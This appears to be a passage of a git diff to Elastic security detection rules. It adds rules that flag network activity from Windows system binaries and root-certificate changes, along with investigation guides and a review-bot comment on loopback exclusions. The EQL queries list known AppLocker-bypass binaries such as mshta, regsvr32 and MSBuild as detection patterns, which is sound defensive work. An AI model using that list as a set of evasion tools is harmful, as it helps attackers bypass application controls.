!{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : 
\"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json new file mode 100644 index 00000000000..84a4fbba68c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_109.json 
@@ -0,0 +1,117 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "winlogbeat-*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Unusual Network Activity from a Windows System Binary",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n (\n process.name : \"msbuild.exe\" and\n destination.ip != 
\"127.0.0.1\"\n ) or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n ) and\n /* Localhost, DigiCert and Comodo CA IP addresses */\n not cidrmatch(destination.ip, \"127.0.0.1\", \"192.229.211.108/32\", \"192.229.221.95/32\",\n \"152.195.38.76/32\", \"104.18.14.101/32\")\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1fe3b299-fbb5-4657-a937-1d746f2c711a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + 
{
+ "id": "T1127.001",
+ "name": "MSBuild",
+ "reference": "https://attack.mitre.org/techniques/T1127/001/"
+ },
+ {
+ "id": "T1218.005",
+ "name": "Mshta",
+ "reference": "https://attack.mitre.org/techniques/T1218/005/"
+ }
+ ]
+ },
+ {
+ "id": "T1036",
+ "name": "Masquerading",
+ "reference": "https://attack.mitre.org/techniques/T1036/",
+ "subtechnique": [
+ {
+ "id": "T1036.005",
+ "name": "Match Legitimate Name or Location",
+ "reference": "https://attack.mitre.org/techniques/T1036/005/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 109
+ },
+ "id": "1fe3b299-fbb5-4657-a937-1d746f2c711a_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json
index 1d888baaf47..83fdd95758b 100644
--- a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_100.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -62,7 +62,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json
index f63117b5a9b..c7c0468f596 100644
--- a/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/2003cdc8-8d83-4aa5-b132-1f9a8eb48514_101.json
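Review bot: The loopback carve-outs in the network stage of `query` cover only IPv4 `127.0.0.1` — the new `msbuild.exe` branch compares `destination.ip != "127.0.0.1"` and the `msiexec.exe` `cidrmatch` list starts with the same single address — so a connection to `::1` or to another `127.0.0.0/8` address still alerts; `not cidrmatch(destination.ip, "127.0.0.0/8", "::1")` would state the intent in both branches. The DigiCert/Comodo responder addresses in that `cidrmatch` are a point-in-time snapshot, and the `/* Localhost, DigiCert and Comodo CA IP addresses */` comment records neither where they came from nor when they were checked; OCSP endpoints move, so the exclusion will silently stop matching (or start excluding a reassigned address), and the comment should read something like `/* Loopback plus DigiCert/Comodo OCSP responder IPs — source: <where the list came from>, verified <YYYY-MM-DD>; revalidate on every rule bump */`. Minor: the process stage spells `"MSBuild.exe"` while the network stage uses `"msbuild.exe"`; `:` matches case-insensitively so both work, but one spelling would read better.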
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -61,7 +61,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json index b280913119e..554208ce793 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json index e82a12a0207..60d7594b572 100644 
--- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json index 5fd84a5bdd9..65b5e30447a 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json index 50b2aa7d37d..a06241c69bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_107.json 
@@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json index dcac3f7004c..e21e1533710 100644 --- a/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/201200f1-a99b-43fb-88ed-f65a45c4972c_108.json 
@@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json index 4c96a3f46ab..2c48a7b8cdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_104.json 
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json index 6874e047c0c..56707485f51 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_105.json 
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json index 10fb878d464..11ab15cb66b 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json index 1500b99b13d..08acff1afc4 100644 --- a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_107.json 
@@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "203ab79b-239b-4aa5-8e54-fc50623ee8e4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json new file mode 100644 index 00000000000..32cf27d1372 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/203ab79b-239b-4aa5-8e54-fc50623ee8e4_108.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.", + "false_positives": [ + "Certain applications may install root certificates for the purpose of inspecting SSL traffic." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation or Modification of Root Certificate", + "note": "## Triage and analysis\n\n### Investigating Creation or Modification of Root Certificate\n\nRoot certificates are the primary level of certifications that tell a browser that the communication is trusted and legitimate. This verification is based upon the identification of a certification authority. Windows adds several trusted root certificates so browsers can use them to communicate with websites.\n\n[Check out this post](https://www.thewindowsclub.com/what-are-root-certificates-windows) for more details on root certificates and the involved cryptography.\n\nThis rule identifies the creation or modification of a root certificate by monitoring registry modifications. The installation of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
